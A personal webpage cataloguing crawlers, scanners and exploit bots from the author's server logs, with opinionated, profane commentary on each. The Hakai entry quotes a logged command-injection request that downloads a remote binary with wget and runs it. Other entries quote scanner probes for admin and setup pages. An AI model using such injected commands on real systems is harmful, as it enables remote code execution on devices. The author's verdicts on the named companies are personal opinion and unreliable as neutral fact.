Notes On Robots

MRU: 1 February 2026

Goto Thebotlist bookmark to skip the editorializing.

This lists software (code, tools, programs) that read (scan) multiple Websites. There ain't anything new or spectacular here, I'm just amusing myself... I *am not just compiling a list of Bot User Agent strings! (That would be a waste of time and a drag for people searching for information about a Bot.)

Included are all automated programs/code that I find, whether a "Search Engine" or "malicious code" - I do not distinguish between the two. And there are many "in between" those two ends. If a classification were done, it might look like this:

  1. Search Engines - companies that index website content for people to search.
  2. Website Services - companies that index website content to sell services (SEO).
  3. White Hats - coders/people that index website exploits to list on their own website.
  4. Crackers - coders/people that just like (apparently) to break websites.
It's not "Hackers/Hacked", okay? The correct terms are "Crackers/Cracked". OKAY? Hackers are your friends.

Sometimes a Bot uses someone else's Bot Code to do their Bot Shit; code like "zgrab" and "httpx" for example. And some do their Bot Shit in total isolation (nobody writes about them) like "Alittle Client", "Hello, [Ww]orld" and the new "0xAbyssalDoesntExist".

Not included are CLI/API sources like WGET, CURL and like Perl and Python libraries. They can do Bot Shit, but can also be "Users". (As Bots they often go after .ENV and .GIT shit which yer hosting company blocks, so they are just being silly.)

The Bot names here are usually "BotName/VERS; URL" from the User-Agent string but I might not be always exact. (Many do not adhere to the common format.) (Note: I do not just use the whole Bot user agent string, but just the name/contact part; there is a reason for this.)

The order of the Robots listed here started (bottom up) randomly; now the list grows top down with lastest discovered first. (Obsolete Bots are not de-listed.)

Other Resources

Note: I do not am not recommending any of these websites - I am just listing them. (I find most of them to be useless.)

  1. matomo-org/device-detector/master/Tests/fixtures/bots, a long list of Bot names and metadata.
  2. User Agents lists user agent strings. (Though that's near all they do.)
  3. Udger also lists user agent strings
  4. Bots FYI - they have a super! search feature, it searches Bot description data, not Bot name data. sigh
If you do not want your website exploited, don't put exploitable code on your website!

Latest coolest User Agent String:

    MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0

Thebotlist

sqalix-homepage-scraper/1.0

Does not read robots.txt.

Sqalix sends intelligent cold emails to real companies and delivers replies from businesses that show genuine interest in your products or services.

What else could they be doing - cold calling my websites - beside scraping for e-mail addresses to send their SPAM to? Wait! There's more!

Emails are sent from our own warmed-up infrastructure. Multiple copy variations avoid spam flags and increase replies.

Sqalix is a SPAMMER.

FinepdfsBot/1.0

Just got my (only) PDF available for download downloaded. Weird. It was missing for since forever and I put it back up yesterday...

FinePDFs ... is the largest publicly available corpus sourced exclusively from PDFs, containing about 3 trillion tokens across 475 million documents in 1733 languages.

That's what huggingface.co says... What finepdf.com says:

We don't just provide a library; we provide a production-ready ecosystem for mission-critical document processing.

[barf-emoji]

It's just more AI scraping of "data". And of course they do it without permission.

Discordbot/2.0 +https://discordapp.com

Just seen; Just got root. Why me?

Chrome Privacy Preserving Prefetch Proxy

More Google Chrome "We're so special!" shit for anonymity caching or something... (Maybe an innocent idea, but, probably not.)

MakeMerryBot/1.0 +https://makemerry.app/bots

• Reads robots.txt.

Find entertainment and events for you and your loved ones. Search for fun activities, places, and events by date and location.

A Coming Soon new events App.

node

Another Node created Bot I guess. Light - just reads root occasionally.

axios/1.9.0

Only seen right after "node".

Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity

That's their user agent string! Another version of Expanse, I guess.

Cortex ('docs-cortex.io') is the AI-powered internal developer portal (IDP) that helps engineering teams ship reliable, secure, and efficient software, faster.
    if [[ "AI" == "BS" ]]; then
        echo "true"
    fi

Come on, guys! Use of a properly formated user agent string should not be a fucking recommendation! It's like advertising to administrators via web logs! (Look how many bangs you made me use! UGH!)

t3versionsBot/1.1 +https://www.t3versions.com/bot

The t3versions bot is a friendly web crawler, which searches the internet for websites running the open source content management system TYPO3 CMS.

TYPO3 CMS version analysis. "Collected data is aggregated for statistical purposes only and publicly available."

Okay. Inquiring minds want to know, I guess...

AnyConnect-compatible OpenConnect GUI VPN Agent v9.12

Technically not a bot, but listed anyway (also used "Mozilla/5.0 SV1"); a GUI wrapper for Openconnect VPN for Windows, via Cisco's AnyConnect. Makes (unknown) POST requests to "vpn." domains.

As with many of the non-scraping-crawler-spider-bots, why me?

Website-info.net-Robot https://website-info.net/robot

Entdecke die Technologien hinter den Websites und erhalte wichtige Informationen, um das Internet besser zu verstehen.

MsEdge Translate: "Discover the technologies behind the websites and get important information to help you Internet better understood."!

We provide detailed information on 28,356,859 domains. This information includes SEO data, screenshots, technologies used, and more. Why not give it a try by searching for your own domain?

Why not?

Suchergebnisse für (Search results for) 'gajennings.net'

[BLANK!]

NotionDomainChecker/1.0

• Did not read robots.txt and probably not going to as it's probably just what it says for it's from an "AI" company called Notion:

Notion is where your teams and AI agents capture knowledge, find answers, and automate projects. Now a team of 7 feels like 70.

File this one under, AI equals BS. But you can "get it for free!" But they have designed all their visual stuff well... So, maybe more later.

TerraCotta https://github.com/CeramicTeam/CeramicTerracotta

• Reads robots.txt.

A Beta crawler for ceramic.ai. Nothing there yet. Someone should tell them that their crawler ID String is not properly formatted. (They have a lot of money. You'd think they'd get that right.)

SitesOverPagesBot/1.0 +https://sitesoverpages.com/bot

• Reads robots.txt.

A "Discover New Sites" home page that does nothing.

Okay. (But you can get on their waitlist!)

Orbbot/1.1

• Only reads root. Might be Tor for mobile.

LinkBloom/2.7.11; (Educational Domain Discovery +https://hamidsoltani.com/linkbloom)

• Did not read robots.txt. Unknown.

facebookexternalhit/1.1 +http://www.facebook.com/externalhit_uatext.php

I did not look at what this Facebook thing is, but it does adhere to robots.txt.

Maybe Facebook tracks links in their posts or whatever.

meta-externalagent/1.1 +https://developers.facebook.com/docs/sharing/webmasters/crawler

I did not look at what this Facebook thing is, but it does NOT adhere to robots.txt. Gets "/" and then "/index.html", which is a violation of netiquette - not to say just stupid.

Whatever this is, it ain't good. And it's fairly aggressive.

wpbot/1.3 +https://forms.gle/ajBaxygz9jSR8p8G9

• Reads robots.txt then reads "/enhancecp", so, WTF? Enhance is "The next-gen hosting control panel." A definite WTF.

The site forms.gle is a "URL shortener", and that ID is to a Google Forms form. Which in this case is an "Opt-out request form" for nobody knows...

To exclude your website from the crawling, please provide us with your IP address and domain name... We understand that this may be a nuisance...

No shit.

HTMLScanner/1.0

• Did not read robots.txt. Unknown.

ev-crawler/1.0 +https://headline.com/legal/crawler

• Does not read robots.txt.

A website that reads like it's written by AI, i.e. bullshit:

Over the past 20+ years, we have launched dedicated Early Stage Funds around the world, each offering up-close support to founders in their early days. As businesses reach global scale, our Growth Fund is poised to take them to new heights

RecordedFuture Global Inventory Crawler

Seen once for "/".

GPTBot/1.2 +https://openai.com/gptbot

• Reada robots.txt.

CMS-Checker/1.0 +https://example.com

• Does not read robots.txt.

Since they just read root I guess they index CMS's. Funny about their URL...

IbouBot/1.0; +bot@ibou.io +https://ibou.io/iboubot.html

• Reads robots.txt. A search engine.

DnBCrawler-Analytics

• Does read robots.txt. Totally unknown. (Dun and Bradstreet?)

BitSightBot/1.0

• Reads robots.txt via python-requests; then reads JPEGs.

Bitsight is the only cyber risk intelligence platform that detects, prioritizes, and mitigates threats across your attack surface and third-party ecosystem.

Typical BS.

cc_bot

• Just reads sitemap.xml.

ORT/v1.0.0 visit ORTc.me

• Reads robots.txt. Only reads robots.txt.

NsToolsBot/analyse

• Reads robots.txt. Unknown.

TerraCotta https://github.com/CeramicTeam/CeramicTerracotta

• Does not read robots.txt but is very light.

If you're reading this, you've likely noticed a Ceramic TerraCotta robot in your server logs. Don't worry—I’m a responsible web crawler that respects robots.txt, the standard mechanism for webmasters to control which parts of a site bots can access.

Oh?

In our upcoming product, we aim to drive valuable traffic to your websites—stay tuned for more details! Visit us at ceramic.ai for more details about our mission and technology.

Oh, please.

anthropic-ai

This is so expected: AI Bots. Which is not just AI programs but the companies behind them... While this one did read robots.txt.

Not seen in a while.

tchelebi/1.0 +http://tchelebi.io

• Did not read robots.txt.

NormShield, Inc. [aka Black Kite] is the leading provider of cyber risk quantification software... working with large corporations to help establish and optimize quantitative risk management programs.

OK, but why my shit? Oh, they are simply scanning the entire Internets and collecting data... And:

NormShield scans the internet from 45.155.146.0/24 subnet, where you can allow the list or block list if you wish.

No. You (they) should read the robots.txt file. For website creators to have to manage Bot access by log file review... is a futile effort and a waste of time.

And then:

"Sometimes we make follow connections from other machines on dynamic IP addresses, but blocking the addresses above is sufficient to prevent your device from appearing in our cyber risk monitoring platform. NormShield data is used by vendor risk analysts and network administrators to detect security problems and alert operators of vulnerable systems. If you block our scans, you may not receive these important security notifications." [emphasis added]

Total. Bullshit.

CheckMarkNetwork/1.0 (+http://www.checkmarknetwork.com/spider.html)

• Does read robots.txt.

The world is really scary! We'll monitor your brand-shit for you! Whatever.

Domains Project/1.3.7 +https://domainsproject.org

• Does read robots.txt. A Project to create a list of domain names.

World’s single largest Internet domains dataset. This public dataset contains freely available sorted list of Internet domains.

Petabytes of data... for something er other...

BitSightBot/1.0 https://www.bitsight.com/

• Does not read robots.txt. A "Cyber Risk Analytics" company. (Whatever that is.)

Objective, trusted data and analytics on global, national, and sectoral cybersecurity performance

WOW! (NOT!)

researchscan.comsys.rwth-aachen.de

• Does not read robots.txt.

They say, "... an Internet-wide research study ... by computer scientists at RWTH Aachen University. The research involves making benign connection attempts to every public IP address."

They also say, "you can configure your firewall to drop traffic from the subnet we use for scanning: 137.226.113.0/26." But their traffic originates from many other IP addresses.

SummalyBot/3.0.4

• Does not read robots.txt. Unknown. No results found in a quickie web search.

2ip bot/1.1 (+http://2ip.io)

• Does not read robots.txt.

Weird, as they are selling lookup and related services – why scrape shit?

Gregarius/0.5.2 (http://devlog.gregarius.net/docs/ua)

Gregarius does not have any sponsors for you.

IonCrawl (https://www.ionos.de/terms-gtc/faq-crawler-en/)

Did not read robots.txt. (Just seen.) IONOS is just a web-hosting company.

It crawls the web "to allow us to improve and expand our world-class hosting services," whatever that means.

Neevabot/1.0 +https://neeva.com/neevabot

• Adheres to robots.txt. Just another search engine. So far very light.

XMCO abuse.xmco.fr

This is funny. The Bot not a Bot that says it's:

The XMCO Cabinet. Trusted experts in your company's cyber security service!

Yet from my POV they are simple abusers, checking up on a few (lame) known exploits... over and over and over... They use l9tcpid, Go-http-client and their own (guessing) libraries to scour. sigh

(While some "threat actor listers" list XMCO as a "threat", looks like XMCO is just sloppy.)

BestProxies (+https://best-proxies.ru/faq/#from)

Another not a bot but like a bot... Indexing and/or selling Proxies or something.

Using HTTP CONNECT method for various other websites. (That's yer hosting company's thing to block, which they probably do.)

KStandBot/1.0 http://url-classification.io/wiki/index.php?title=URL_server_crawler

Did not read robots.txt. First seen 10 Nov 2022. Read just root.

We Classify The Web Layer By Layer

Whatever that means. Though they seem to be selling services for "Protection" or some shit. Whatever.

What's extra funny about them? Their front page has Google reCAPTCHA to prove "I'm not a robot".

SurdotlyBot/1.0 +http://sur.ly/bot.html

Did not read robots.txt. First seen Oct 2020

Sur.ly alters the outbound links on your site so that visitors can get to external target pages without leaving your domain.

What? The? Fuck? But okay, say that's a cool thing... Why are you scraping people's shit? (Oh, and "domaining" external links within yer domain ain't cool. That's like IE Era shit.)

got (https://github.com/sindresorhus/got)

First seen; one root request, October, 2022. Another Node.js creeper...

firebounty.com

Okay, firebounty (aka YesWeHack) is not a Bot in the typical sense, however, they index/catalog/link website's "/.well-known/security.txt" files, so you'll see them by referer.

So, they are using other people's content for their content. And then they say:

Users shall have no intellectual property rights to the Site at https://firebounty.com or its Services as well as their contents. Unless authorized by statutory provisions, users may not utilize content obtained through the Site or its services.

Fucking Wow! (Though they have their "out" with the phrase, "Unless authorized by statutory provisions", which probably to them justifies their use of yer shit.)

everyfeed-spider/2.0 (http://www.everyfeed.com)

First seen for a few root requests, October, 2022.

Node.js

Great... Someone created a Bot with Node. Just Great...

ZmEu

A documented phpMyAdmin scanner.

    "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 404 "-" "ZmEu"
    "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 404 "-" "ZmEu"
    "GET /pma/scripts/setup.php HTTP/1.1" 403 403 "-" "ZmEu"
    "GET /myadmin/scripts/setup.php HTTP/1.1" 404 404 "-" "ZmEu"

People just should not install admin shit in a default admin location!, use like /notadmin/ or something...

sheesh

SeekportBot +https://bot.seekport.com

• Does read robots.txt.

Though a few write-ups complaining about SeekportBot were found, this is first contact for me.

Looks like just yer basic search engine.

WhatStuffWhereBot

• Does read robots.txt. Unknown.

Momentum

So far only Shellshock attempts.

Cloud mapping experiment. Contact research@pdrlabs.net;

A well known exploiter. A more in depth look: https://zeltser.com/malicious-web-requests/ .

panscient.com

• Does read robots.txt.

Panscient crawls the web and turns unstructured information on companies and their employees into structured databases. Our databases are used for sale lead generation, business intelligence, marketing and recruiting. We help organizations provide complete and comprehensive corporate information to their customers.

Seems like enabling people to SPAM...

gbrmss/7.29.0

Exploiter. Mostly trying /admin/config.php.

I have been seeing this for a year, but forget to log it, as it ain't prolific. Not very many search hits.

Insomania/1.0

• Does not read robots.txt.

First seen 31 Aug 2022. Just got root. No search hits.

InternetMeasurement/1.0 +https://internet-measurement.com/

• Does not read robots.txt.

They've been getting root and the site's associated icon.

This domain is used to discover and measure services that network owners and operators have publicly exposed.

Not another one! Sheesh!

If you find particular probes technically or operationally problematic, please let us know why:

Really? Are you saying you could cause problems?

To opt out, block these IP ranges: ... You may also opt out by sending your IP ranges to ...

Ah, please stop.

wp_is_mobile

I have been igoring that one for a long time, as it's, well, I dunno. Just a run-o-the-mill Wordpress exploiter. So it's docxd here for S&G - wp_is_mobile log.

Qwantify/1.0 +https://www.qwant.com/

• Does read robots.txt.

Why havn't I doxd this before? (I'm slow...)

Wondering who uses Qwant? We do too.

X'lent! A search engine with a sense of humor!

"The search engine that doesn't know anything about you Zero tracking of your searches. Zero sale of your personal data."

React.org

• Does read robots.txt but does not adhere to it...

Calling themselves "The Anti-Counterfeiting Network":

Supporting members in their anti-counterfeiting strategies by providing customs – online – and market enforcement services at non-commercial fees. To support activities to protect all rights holders, consumers and governments against the negative consequences of the trade in counterfeited goods.

RestSharp/107.3.0.0

Yet another HTTP library.

It's been trying for variations of "/adminer.php". WTF? and, lately, "/.git/config". frack

Probably, the most popular REST API client library for .NET.

Okay. Yeah. Sure.

Screaming Frog SEO Spider/8.1

Only a few requests for root so far, so, we'll see...

Kinda funky, they request with a typical UA first, then with their UA. (Interesting.)

Hakai/2.0

Just seen. An exploiter attacking "/login.cgi":

    "/login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$"

Yes, a WTF?

serpstatbot/2.1; (advanced backlink tracking bot; https://serpstatbot.com/ abuse@serpstatbot.com)

• Does read robots.txt. Seems to be a heavy reader.

...crawls the web to add new links and track changes in our link database. We provide our users with access to one of the largest backlink databases on the market for planning and monitoring marketing campaigns.

Frack! Not another one! Oh, and really?:

"Does the bot crawl links with the rel = nofollow attribute? Yes, it scans."

RepoLookoutBot/1.0.0 (abuse reports to abuse@repo-lookout.org)

• Does not read robots.txt. (And they identify as a Robot!)

Repo Lookout is a large-scale security scanner, with a single purpose: Finding source code repositories, that have been accidentally exposed to the public and reporting them to the domain’s technical contact.

Yet another useless "We are here to help," Bandwidth waster. (RepoLookout is a solution looking for a problem.)

This bot will try every directory for ".git" shit. Stop wasting my time.

project_patchwatch

• Does not read robots.txt. Been doing these:

    "\x16\x03\x01" 404
    "GET / HTTP/1.1" 200
...group of students at Esslingen University scanning the internet to gain insights into network security. If u want us to stop scanning your IP range, get in touch with us [email]...

robots.txt! ROBOTS.TXT! ROBOTS DOT TEXT!!! sheesh

InfoTigerBot/1.9 +https://infotiger.com/bot

• Does read robots.txt.

The "Independent, privacy respecting search engine". Looks very... inviting.

More than 30 years after the World Wide Web first saw the light of day at CERN, only very few search giants determine the results of all of our web search.

Wow.

... we neither collect user data nor do we track users. For us - a matter of course.

Cool. In fact, they look like a "Very Good Thing!" (I never make recommendations, but InfoTiger merits a very close looking into.)

Applebot/0.1 +http://www.apple.com/go/applebot

• Does read robots.txt.

Why haven't I see these guys before? Weird. They can't be new.

SeznamBot/3.2 +http://napoveda.seznam.cz/en/seznambot-intro/

• Does read robots.txt.

Seznam.cz is a Czech on-line company running, besides other services, the web portal Seznam.cz, which is the first place of choice for millions of Internet users from the Czech Republic.

Okay.

BW/1.1 bit.ly/2W6Px8S

• Does read robots.txt.

The BuiltWith system visits a website to determine the technology profile it is using by looking at the publicly visible code on a website. Millions of people benefit from understanding how websites are built using BuiltWith's free technology profile lookup tool.

While that seems like BS, I'll give them the benefit of the doubt as they play nice.

yacybot http://yacy.net/bot.html

• Does read robots.txt.

YaCy is free software for your own search engine.

Interesting. But they have requested only a single URI here, one that has been gone for years (but one that is still linked to on some websites...).

0xAbyssalDoesntExist

Only POSTs to "/editBlackAndWhiteList" which is maybe a hardware CVE or something.

That URL/URI can be seen in this code: raw.githubusercontent.com/mcw0/PoC/master/TVT-PoC.py, which is some kind of Exploit code...

And, of course, it can be found in many a Website's online Server Logs. (Why do people do that? It servers no purpose. sigh)

The website greynoise.io lists this several times - but looking at their meta data results in more confusion.

httpx Open-source project (github.com/projectdiscovery/httpx)

• Does not read robots.txt.

What they say:

httpx is a fast and multi-purpose HTTP toolkit allows to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.

Okee fine. But why are you reading my stupid little website? Oh, and what they say? Smells like plain 'ole horse hockey pucks.

NihilScio Educational search engine - +https://www.nihilscio.it/NihilScio.htm

Seen just three times, three days in March... They are what they say they are.

dwf-web-archive

Since seen only twice and for an outdated link, this might not be a robot. And nobody else has that string in any webpage... I'll keep it here for S&G.

NsToolsBot/analyse

• Does read robots.txt.

Only 5 hits this year. Another "can't be found by Web Search" Bot. (Why, really, do people place web server logs in the public shpere? It makes zero sense.)

Bytespider https://zhanzhang.toutiao.com/

• Does read robots.txt. Aka bytedance.

I can't read Mandarin...

CATExplorador/1.0beta; (sistemes at domini dot cat https://domini.cat/catexplorador/)

• Does not read robots.txt. But only seen a few times this month. Spain.

fluid/0.0 +http://www.leak.info/bot.html

• Does read robots.txt.

An "Internet Marketing Research" company. I (do) like how they say of their Web hosting company: "The people there are wise and nice."

serpstatbot/2.1; (advanced backlink tracking bot; https://serpstatbot.com/ abuse@serpstatbot.com)

• Does read robots.txt.

We provide our users with access to one of the largest backlink databases on the market for planning and monitoring marketing campaigns.

Huh? What's a backlink? Wait. Don't tell me. I don't want to know.

HTTP Banner Detection (https://security.ipip.net)

• Does not read robots.txt. Only reads "/".

For network security research, we need to obtain the IP location Banner and fingerprint information, we detecting the common port openly or not by ZMap, and collecting opened Banner data by our own code. Any questions please do not hesitate to contact with us: frk@ipip.net.

Ok. But not! [A Chinese company that needs a better English translator.]

go-resty/3.0.0-beta.1 (https://resty.dev);

Last seen only reading robots.txt. Someone experimenting, probably.

go-resty/2.6.0 (https://github.com/go-resty/resty)

• Does not read robots.txt. Aka. MAndroid.

Only reads "/". (Likes to give HEAD.)

Two in one! First seen March, 2022. HEAD with the "go-resty", followed immediately by a GET with "MAndroid". WTF? Just seen so I'll wait for more before wasting my time on them.

Fuzz Faster U Fool v1.3.1

• Does not read robots.txt, but, since the code is a tool "to discover potential vulnerabilities", they will say, "We are not a Spider, Luser..."

On Github.

Nmap Scripting Engine https://nmap.org/book/nse.html

Great. Nmap has a Scripting Engine. (The NSE ain't knew, it's just someone using it has decided to tell us that he/she/they has/have automated it and it found this stupid little website. sigh)

Oh, see https://nmap.org/p51-11.html for how it started.

webprosbot/2.0 (+mailto:abuse-6337@webpros.com)

• Does not read robots.txt.

WebPros delivers the most innovative technologies to enable the digital world. We bring together products and solutions to enable businesses to build, operate, and grow online. Our products help manage servers, websites, billing, and online marketing.

Not another one!

They say their brands include cPanel and Plesk. But why are they automating reading other people's websites?!?!

Dalvik/2.1.0; (Linux; U; Android 9.0 ZTE BA520 Build/MRA58K)

• Does not read robots.txt.

Dalvik is an Android App, a Java Virtual Machine (as most search results indicate). That is as far as I went in research. (Slowly seeing more from them.) Why I initially placed it here was that the UA is formatted as if a Robot...

crawler

Their UA string is: Mozilla/5.0; (compatible; crawler).

A lone image downloader; i.e. it occasionally gets a different image - that's all.

Wappalyzer

• Does not read robots.txt.

Their UA string is: Mozilla/5.0; (compatible; Wappalyzer).

Find out the technology stack of any website. Create lists of websites that use certain technologies, with company and contact details. Use our tools for lead generation, market analysis and competitor research.

Way cool! (Not.) More bandwidth wasting. sigh

deepnoc https://deepnoc.com/bot

• Does read robots.txt.

Some kind of search engine "helper" or something; but looks interesting.

Pandalytics/1.0 (https://domainsbot.com/pandalytics/)

• Does read robots.txt.

The most ccTLD-friendly Name Suggestion on the market. DomainsBot’s name suggestion is optimized to help meet your customers’ demand for local domains. Get a full picture of the domain and hosting market, discover better business opportunities and generate higher revenue.

Such dredge! Yet another waste of bandwidth.

Project-Resonance (http://project-resonance.com/)

• Does not read robots.txt.

Internet wide surveys to study and understand the security state of Internet as well as facilitate research into various components / topics which originate as a result of our surveys.

Aw fuck. Yet another "White Hat" trying to protect me from myself. sigh

Further self-justifuckencation shit from them:

You are visting this page most probably because you saw this url in your logs. Well, nothing to worry. So, what Happened? You recieved a [sic] innocent HTTP request from one of our distributed research engine as a part of Project Resonance. We perform internet-wide security research and send non-malicious and non-intrusive requests for the same. We take special care of making sure no systems are negatively affected because of our scans.

I like (not) how they use the word "innocent".

And then there is this:

And if you would not like any of our further probes, please drop us an email at [email protected]. Please make sure that you include the list of IP Addresses / IP Ranges which you would like to get excluded. Once we hear from you, we will simply put your IP Ranges on our exclusion list and you will never see any probe from us.

No, there is something called "Robots Exclusion Standard". (And the "[email protected]" thing means THEY DO NOT WANT BE SCANNED NEEDLESSLY! Needs Javascript enabled to display the address. It's a Cloudfare, /cdn-cgi/l/email-protection thing...)

Not needed. Not wanted. Thank you very much. Go the fuck away!

archive.org_bot http://archive.org/details/archive.org_bot

• Does read robot.txt.

This is the "Internet Archive" bot; aka "Wayback Machine".

ArchiveTeam ArchiveBot/20210517.c1020e5 (wpull 2.0.3)

• Does not read robots.txt. They will claim that they are not a spider, but they are.

What they say:

HISTORY IS OUR FUTURE And we've been trashing our history.

Really?!?! (But actually, WTF does that even mean?!?!)

Archive Team is a loose collective of rogue archivists, programmers, writers and loudmouths dedicated to saving our digital heritage.

They have much more to brag about... They also say, via their wiki:

ArchiveBot is an IRC bot designed to automate the archival of smaller websites (e.g. up to a few hundred thousand URLs). You give it a URL to start at, and it grabs all content under that URL, records it in a WARC file, and then uploads that WARC to ArchiveTeam servers for eventual injection into the Internet Archive's Wayback Machine (or other archive sites).

So, how did they get to my pathetic, always changing, stupid little website? My shit does not need these kinds of "services", thank you very much.

DuckDuckGo-Favicons-Bot/1.0 http://duckduckgo.com

UGH! Favicon draggers... sigh

They should adhere to to robots exclusion standard, should they not? Of course they should.

DuckDuckGo's does not.

masscan/1.3 (https://github.com/robertdavidgraham/masscan)

• Does not read robots.txt. But they will say, "We are not a spider, Luser."

They do say they are a "TCP port scanner" that:

... spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.

Sounds cool. Not.

And why me? Oh...

"It can also complete the TCP connection and interaction with the application at that port in order to grab simple "banner" information."

Scanners! Analizers! SEOs! Oh my! When are these fucking people going to stop! Not necessary here! Stop stealing my bandwidth! Stop slowing the Internets to a crawl!

https://gdnplus.com Gather Analyze Provide.

• Does not read robots.txt.

"Global Digital Network Plus scours the global public internet for data and insights. To accomplish this, GDNP sends packets to all IPv4 IP addresses. While far within legal boundaries, sometimes our benign research initiatives are mistaken for malicious network reconnaissance. If you are interesting in removing your organization’s IP space from within our scope, please send us an email at contact@gdnplus.com."

I have to ask you to remove my "organization’s IP space from" your scope? Oh, please.

ThinkChaos/0.3.0 In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow_to_the_robots.txt._Thank_you.

• Does not read robots.txt (kind of ironic, donchta think?).

zgrab/0.x

• Does not adhere to robots.txt. (I am positive, that if you ask them, they will say, "We are not a spider, Luser"...)

From their gitshit, I mean github:

ZGrab is a fast, modular application-layer network scanner designed for completing large Internet-wide surveys. ZGrab is built to work with ZMap (ZMap identifies L4 responsive hosts, ZGrab performs in-depth, follow-up L7 handshakes). Unlike many other network scanners, ZGrab outputs detailed transcripts of network handshakes (e.g., all messages exchanged in a TLS handshake) for offline analysis.

That's a huge WTF as that all is techobabble.

From https://linuxsecurity.expert/tools/zgrab/:

ZGrab is commonly used for penetration testing, security assessment, or vulnerability scanning. Target users for this tool are pentesters.

Okay, but why my website? And here's the shit they requested this month (most root requests removed):

    88.9.119.217 - "GET / HTTP/1.1" 200 7666 "-" "Mozilla/5.0 zgrab/0.x"
    45.137.23.85 - "GET / HTTP/1.1" 200 7666 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.215.102 - "GET /portal/redlion HTTP/1.1" 400 177 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.215.90 - "GET /actuator/health HTTP/1.1" 400 177 "-" "Mozilla/5.0 zgrab/0.x"
    198.199.92.190 - "GET /hudson HTTP/1.1" 400 177 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.209.134 - "GET /manager/text/list HTTP/1.1" 410 4 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.213.236 - "GET /manager/html HTTP/1.1" 410 4 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.211.238 - "GET /portal/redlion HTTP/1.1" 400 177 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.212.202 - "GET /actuator/health HTTP/1.1" 400 177 "-" "Mozilla/5.0 zgrab/0.x"
    192.241.213.94 - "GET /hudson HTTP/1.1" 400 177 "-" "Mozilla/5.0 zgrab/0.x"

Not exactly looking like "good guys," eh?

CensysInspect/1.1 +https://about.censys.io/

• Does not adhere to robots.txt.

What they say:

Your cloud is bigger, wider, and more vast than you know; your internet assets innumerable. Censys is the proven leader in Attack Surface Management by relentlessly searching and proactively monitoring your digital footprint far more broadly and deeply than ever thought possible.

They go on with their bullshit:

Censys ASM provides a comprehensive profile of the IT assets on the internet, we empower defenders.....

Two things: Who are they fooling and why do they access my pathetic little website?

They also do a request without a user agent string, which is a 400. Then they immediately make a request with their UA; which gets 'em a 403...

Linux Gnu (cow)

• Does not adhere to robots.txt, but probly not a spider..

Just gets root about 20 times per month; two IP addresses.

Funny, since first seen months ago, no one seems to have written about this... Whatever it is.

(But one will see many "hits" as oh so many people/sites make their server log files public. Why would anyone do that? Who/What does that help?)

Oh, here's one other hit: https://threat.gg/attackers/9afa91cc-e147-4527-b487-7e290a184f92. But that, while they have a Website that is really well designed, simply displays a single request's data as Json, it's lamer than this...

Linespider/1.1 +https://lin.ee/4dwXkTH

• Does adhere to robots.txt.

(Redirects to https://help2.line.me/linesearchbot/web/.)

Linespider is a Web crawler that provides a wide range of search results for LINE services...

WTF is/are "LINE services"? Then I realized that, lin.ee/ is the Bot for line.me/, a Japanese messaging App.

LINE has grown into a social platform with hundreds of millions users worldwide, having a particularly strong focus in the rapidly advancing continent of Asia.

Why they need a Bot, though, they do not say.

Baiduspider/2.0 +http://www.baidu.com/search/spider.html

• Does not adhere to robots.txt.

While sometimes called the "Google of China," they are very annoying as not only do not read robots.txt they also sometimes mis-identify themselves.

FlfBaldrBot/1.0

• Does not adhere to robots.txt.

I almost missed this one. It was in the "ssl_log" log file for last month... A duckduckgo search resulted in:

    Not many results contain flfbaldrbot
    debilsoft IP-Logger PRO Web analytics
    [Search domain debilsoft.de] debilsoft.de/ip_logger_pro/iplog_us.php?action=show
    [MAP] [Wiki] United States. 64.227.120.48. FlfBaldrBot/1.0.
    No more results found for FlfBaldrBot.

Funny thing about the one hit - "IP-Logger PRO; visitor data & web analystics" - it is dynamically generated so my visit did not see that bot in their logs. debilsoft's logger page is well formed and easy to read. Kinda nice.

NetSystemsResearch netsystemsresearch.com

• Does not adhere to robots.txt.

Their UA is the actual string below.

NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com.

From their main page:

Net Systems Research is an independent research organization focusing on a range of topics in internet security including IoT Proliferation, Zero Trust Networking, Network-Level Security, Cyber Risk Modeling and External Network Security Measurement. We focus on surveying and analyzing real world network systems to better understand and study challenging internet security problems. Through our research, we hope to improve the current understanding of the global internet’s security and promote better network security practices.

Wow! That's bold! But is just marketing bullshit? You betcha!

What really bugs me about these kinds of "We are here to help!" websites is:

  1. They do not adhere to the robots.txt standard - it's a "Standard."
  2. They say "If you would like your IP ranges or domains to be excluded from our studies, please contact us at abusedepartment@netsystemsresearch.com with the IP ranges and/or domains and *any associated ownership information* that is relevant to processing your request."
  3. Number 2 is a big "Fuck You you arrogant jerks," from my view. I run static, non-services websites, and I do not need anyone's "help" to run them.
  4. Since they do not adhere to such a basic web standard as robots.txt, how can they be trusted for anything?

DataForSeoBot/1.0 +https://dataforseo.com/dataforseo-bot

• Does adhere to robots.txt. A pay for SEO.

From their main page:

Powerful API Stack For Data-Driven Marketers.

"We provide comprehensive SEO and digital marketing data solutions via API. Everything your SEO software requires — in one place."

Ah, no.

InfoTigerBot/1.9 +https://infotiger.com/bot

• Does adhere to robots.txt.

Search engine.

Independent, privacy respecting search engine... A text only search engine, covering two languages (English+German).

ZoominfoBot (zoominfobot at zoominfo dot com)

• Adheres to robots.txt.

From their main page:

Don’t just go to market, own your market. Accelerate your pipeline with ZoomInfo’s portfolio of solutions that combine B2B intelligence & company contact data with engagement software, and dynamic workflows. Pump the richest B2B data into your tech stack or take advantage of ZoomInfo’s fully-loaded suite of applications to reach your buyers faster.

From their FAQ:

